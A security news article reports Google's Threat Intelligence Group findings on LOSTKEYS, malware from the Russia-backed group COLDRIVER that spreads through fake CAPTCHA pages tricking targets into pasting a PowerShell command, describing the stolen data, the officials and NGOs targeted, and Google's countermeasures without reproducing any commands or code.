A fake Russian CAPTCHA can crawl through private files and has been seen in the wild targeting high officials.
“I am not a robot.” You’ve probably seen this a thousand times. In some cases, instead of verifying that you are human, you can start unrolling an infection chain that leads straight into the hands of Russian intelligence.
Google’s Threat Intelligence Group (GTIG) has identified a new malware strain dubbed LOSTKEYS. This new malware is a digital burglary tool created by COLDRIVER, a Kremlin-backed hacking group also known as UNC4057, Star Blizzard, and Callisto. These are the same operators who’ve spent the last few years targeting NATO officials, Western diplomats, and non-governmental organizations (NGOs).
GTIG identified that the operation starts with a fake CAPTCHA prompt. The target lands on a fraudulent website, likely after being emailed a crafted link. When they “verify” they’re human, the site drops a PowerShell command to their clipboard and tells them to paste it into their Windows run prompt, activating malware. Such a social engineering technique, called ClickFix, has been on the rise, with many threat actors using it to target their victims.
Once inside, LOSTKEYS malware combs through the system, looking in specific directories for files with specific file extensions to quickly steal credentials, exfiltrate emails, and harvest contact lists from compromised accounts. Malware sends all it can sniff out straight back to the attackers.
While credential theft remains the primary tactic, in certain cases, COLDRIVER escalates to deploying malware directly to the target’s device, a move reserved for situations where gaining access to local files is critical.
GTIG says it was spotted in campaigns running as recently as April 2025, but with earlier samples tracing back to December 2023, disguised as legit files tied to Maltego, a well-known OSINT tool. Whether these were early experiments or the work of another actor entirely is still unknown.
Who’s being targeted?
COLDRIVER’s operations are highly targeted, focusing on individuals with access to sensitive information. According to GTIG, the group typically goes after high-profile individuals via their personal email accounts or those associated with NGOs.
The group’s recent activity has focused on current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGO personnel.
Individuals connected to Ukraine have remained a consistent target, reflecting COLDRIVER’s alignment with Russia’s strategic intelligence objectives.
In a small but notable number of cases, COLDRIVER has also been linked to hack-and-leak operations, including campaigns targeting officials in the United Kingdom and at least one NGO, raising concerns about how stolen data may be weaponized to influence public discourse or policy.
After the discovery, Google’s response has been swift. Malicious domains have been removed, while compromised files flagged by Safe Browsing, and targeted Gmail and Workspace users have been warned.
Your email address will not be published. Required fields are markedmarked